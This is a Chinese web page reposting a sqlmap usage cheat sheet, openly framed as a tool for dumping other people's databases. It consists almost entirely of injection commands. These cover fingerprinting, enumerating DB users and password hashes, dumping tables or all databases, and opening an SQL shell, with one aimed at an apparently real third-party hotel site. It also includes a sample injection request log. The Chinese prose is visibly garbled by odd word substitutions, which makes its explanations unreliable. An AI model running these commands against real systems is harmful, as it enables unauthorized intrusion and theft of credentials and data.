|
|
|
联系客服020-83701501

又一篇sqlmap简单说明

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
又一篇sqlmap复杂注明

sqlmap可谓是脱裤子神器,我也蛮喜欢用的,只是技术过渣,为了方便更多的想脱裤子的朋侪,赏析诸多大牛和我并不富厚的运用教导,便有了这篇文章。切实91ri.org在早年也有颁发过sqlmap的运用文章,全体还算不错,可能参考《sqlmap运用条记》《运用sqlmap进行sql注入》

svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev

sqlmap.py -u “http://www.islamichina.com/hotelinchina.asp?cityid=2&m=1″ -v 1 –sql-shell //履行SQL语句

sqlmap.py -u “http://www.islamichina.com/hotelinchina.asp?cityid=2&m=1″ -v 5 //更详细的动静

load options from a configuration INI file
sqlmap -c sqlmap.conf

运用POST举措提交
sqlmap.py -u “http://www.91ri.org/ /sqlmap/oracle/post_int.php” –method POST –data “id=1″

运用COOKIES举措提交,cookie的值用;宰割,可能运用TamperData来抓cookies
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/mssql/cookie_int.php” –cookie “id=1″ -v 1
运用referer欺骗
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/pgsql/get_int.php?id=1″ –referer “http://www.google.com” -v 3

运用自界说user-agent,大要运用随机运用自带的user-agents.txt
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/oracle/get_int.php?id=1″ –user-agent “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)” -v 3

python sqlmap.py -u “http://www.91ri.org/ /sqlmap/mysql/get_int.php?id=1″ -v 1 -a “./txt/user-agents.txt”

运用根底认证
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/mysql/basic/get_int.php?id=1″ –auth-type Basic –auth-cred “testuser:testpass” -v 3

运用Digest认证
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/mysql/digest/get_int.php?id=1″ –auth-type Digest –auth-cred “testuser:testpass” -v 3

运用代理,共同TOR
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/pgsql/get_int.php?id=1″ –proxy “http://192.168.1.47:3128″
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/pgsql/get_int.php?id=1″ –proxy “http://192.168.1.47:8118″

运用多线程猜解
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/mysql/get_int.php?id=1″ -v 1 –current-user –threads 3

绕过消息检测,间接指定有注入点的参数,可能运用,宰割多个参数,指定user-agent注入
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/pgsql/get_int.php?id=1″ -v 1 -p “id
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/pgsql/get_int.php?id=1&cat=2″ -v 1 -p “cat,id”
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/mysql/ua_str.php” -v 1 -p “user-agent” –user-agent “sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)”

指定数据库,绕过SQLMAP的自动检测
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/pgsql/get_int.php?id=1″ -v 2 –dbms “PostgreSQL”

* MySQL
* Oracle
* PostgreSQL
* Microsoft SQL Server

指定操纵琐细,绕过SQLMAP自动检测
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/pgsql/get_int.php?id=1″ -v 2 –os “Windows”

* Linux
* Windows

自界说payload
Options: –prefix and –postfix

在某些环境下存在缝隙的参数是垄断的只需假如用户供应了一个后缀被追加到注射无效Payload。另一个打算,而这些选项来方便引见本人当用户已经晓得,盘问语法,要检测和垄断注入间接供应注射无效payload前缀和/或后缀。

Example on a MySQL 5.0.67 target on a page where the SQL query is: $query = “SELECT * FROM users WHERE id=(‘” . $_GET[‘id’] . “‘) LIMIT 0, 1″;:

$ python sqlmap.py -u “http://www.91ri.org/ /sqlmap/mysql/get_str_brackets.php?id=1″ -v 3 -p “id” –prefix “‘” –postfix “AND ‘test’=’test”

[…]
[hh:mm:16] [INFO] testing sql injection on GET parameter ‘id’ with 0 parenthesis
[hh:mm:16] [INFO] testing custom injection on GET parameter ‘id’
[hh:mm:16] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_str_brackets.php?id=1%27%29%20AND%207433=7433%20AND%20
%28%27test%27=%27test HTTP/1.1
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Host: www.91ri.org/ :80
Accept-language: en-us,en;q=0.5
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
image/png,*/*;q=0.5
User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)
Connection: close
[…]
[hh:mm:17] [INFO] GET parameter ‘id’ is custom injectable
[…]

As you can see, the injection payload for testing for custom injection is:

id=1%27%29%20AND%207433=7433%20AND%20%28%27test%27=%27test

which URL decoded is:

id=1′) AND 7433=7433 AND (‘test’=’test

and makes the query syntatically correct to the page query:

SELECT * FROM users WHERE id=(’1′) AND 7433=7433 AND (‘test’=’test’) LIMIT 0, 1

在这个复杂的例子,sqlmap可能检测注入和垄断它,不需要供应一个自界说注射无效载荷,但偶尔在实践的操纵91ri.org认为是有必要为它。

页面比力
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/mysql/get_int_refresh.php?id=1″ –string “luther” -v 1
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/mysql/get_int_refresh.php?id=1″ –regexp “ lu[\w][\w]er” -v

清扫web的内容
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/mysql/get_int_refresh.php?id=1″ –excl-reg “Dynamic content: ([\d]+)”

多语句测试,php内嵌函数mysql_query(),不支持多语句
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/mysql/get_int.php?id=1″ –stacked-test -v 1

union注入测试
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/oracle/get_int.php?id=1″ –union-test -v 1

unionz注入共同orderby
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/pgsql/get_str.php?id=1″ –union-test –union-tech orderby -v 1

python sqlmap.py -u “http://www.91ri.org/ /sqlmap/mssql/get_int.php?id=1″ -v 1 –union-use –banner
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/mysql/get_int.php?id=1″ -v 5 –union-use –current-user
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/mysql/get_int_partialunion.php?id=1″ -v 1 –union-use –dbs

fingerprint
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/mssql/get_int.php?id=1″ -v 1 -f
python sqlmap.py -u “http://192.168.123.36/sqlmap/get_str.asp?name=luther” -v 1 -f -b

判断当前用户是否是dba
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/pgsql/get_int.php?id=1″ –is-dba -v 1

胪列数据库用户
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/pgsql/get_int.php?id=1″ –users -v 0

胪列数据库用户暗码
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/mysql/get_int.php?id=1″ –passwords -v 0
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/mssql/get_int.php?id=1″ –passwords -U sa -v 0

检查用户权限
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/oracle/get_int.php?id=1″ –privileges -v 0
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/pgsql/get_int.php?id=1″ –privileges -U postgres -v 0

列数据库
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/mssql/get_int.php?id=1″ –dbs -v 0

列出指定数据库指定表的列名
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/mysql/get_int.php?id=1″ –columns -T users -D test -v 1

列出指定数据库的指定表的指定列的内容
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/mssql/get_int.php?id=1″ –dump -T users -D master -C surname -v 0

指定列的范畴从2-4
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/mysql/get_int.php?id=1″ –dump -T users -D test –start 2 –stop 4 -v 0

导出扫数数据库,扫数表的内容
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/mysql/get_int.php?id=1″ –dump-all -v 0

只列出用户本人新建的数据库和表的内容
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/mssql/get_int.php?id=1″ –dump-all –exclude-sysdbs -v 0

sql query
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/pgsql/get_int.php?id=1″ –sql-query “SELECT usename FROM pg_user” -v 0
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/mysql/get_int.php?id=1″ –sql-query “SELECT host, password FROM mysql.user LIMIT 1, 3″ -v 1

SELECT usename, passwd FROM pg_shadow ORDER BY usename

保留和恢复会话
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/pgsql/get_int.php?id=1″ -b -v 1 -s “sqlmap.log”

保留选项到INC配置文件
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/pgsql/get_int.php?id=1″ -b -v 1 –save

link:http://www.redrain.tk/?p=81

本文由网络安全攻防研究室(www.91ri.org)动静安全小组收集整理,转载请注明来由!

数安新闻+更多

证书相关+更多